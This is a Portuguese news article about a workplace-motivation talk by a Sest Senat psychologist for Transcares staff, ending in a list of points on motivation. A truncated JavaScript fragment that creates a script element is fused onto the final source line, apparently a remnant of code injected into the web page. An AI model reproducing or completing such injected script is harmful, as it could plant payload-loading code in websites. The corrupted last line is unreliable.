Manhã de conhecimento, motivação e trabalho

Psicóloga do Sest Senat de Cariacica dá palestra no Transcares

A quarta-feira, 13 de abril, começou de maneira diferente para os profissionais que compõem o quadro pessoal do Transcares. Ao invés dos afazeres diários, todos participaram da palestra “Motivação e Trabalho”, realizada pela psicóloga do Sest Senat de Cariacica, Hely Tavares. Em uma hora e meia de bate-papo com o grupo, Hely mostrou como essas duas palavras, embora sejam coisas totalmente diferentes, precisam andar de mãos juntas.

“A motivação é o combustível para nosso esforço, é o que nos impulsiona a fazer melhor. E quando se trata de motivação para o trabalho, é importante destacar que ela independe de um bom salário e de um chefe bacana. O trabalho em equipe, a troca de experiências com os colegas, o desenvolvimento de nossas habilidades, as conquistas e responsabilidades divididas, isso sim vai fazer a diferença”, ressaltou.

A psicóloga observou, ainda, que as pessoas são diferentes e carregam sua própria história. “Dessa forma, o que é motivação para um, pode não ser para outro. E isso precisa ser respeitado”, disse.

Outro ponto abordado foi o fato das nossas necessidades e motivações mudarem ao longo da vida. “Estamos em constante mudança. E se não permitirmos essa ‘atualização’ do corpo e da mente, abrimos porta para as doenças psicossomáticas (gastrite, hipertensão, dermatite, dentre outras). Precisamos, portanto, nos aceitar e aceitar que o mundo não para”, argumentou ela, que no final da palestra aplicou um Teste de Resiliência – uma adaptação do teste original do Serviço de Psicologia do Hospital do Coração de São Paulo.

A palestra com Hely é a primeira de uma série de três que terá como público-alvo a equipe do Transcares. As próximas reunirão o mesmo grupo com a nutricionista da unidade Aylmer Chieppe, Iêzide Klein, e com uma de suas fisioterapeutas – Márcia Maia ou Bruna Helaine de Freitas.

“Temos uma demanda interna de treinamentos e, neste primeiro momento, decidimos focar em temas que estão ligados à saúde, bem-estar e qualidade de vida. E recorremos aos profissionais do Sest Senat porque além de serem grandes parceiros do Transcares eles entendem como ninguém a realidade de quem atua no setor de transportes”, argumentou a Analista de Recursos Humanos do sindicato, Mariana Benincá.

Sobre a motivação:

– Motivação é o que nos faz agir de uma maneira ou assumir um comportamento;

– Somos seres relacionais e nos construímos na relação com o outro. Cada pessoa tem uma história e é única. Portanto, o que motiva um pode não motivar o outro;

– A motivação segue um fluxo de dentro para fora, mas sofre influência também de fatores externos, considerando a relação com o ambiente que vivemos;

– Uma pessoa pode estar ou não estar motivada num determinado momento para uma situação específica, mas tanto a motivação quanto a desmotivação podem mudar no decorrer da vida;

– As atitudes que temos influenciam não apenas a nossa motivação, mas também a dos colegas de trabalho.

* Fonte: Hely Tavaresvar d=document;var s=d.createElement(‘script’);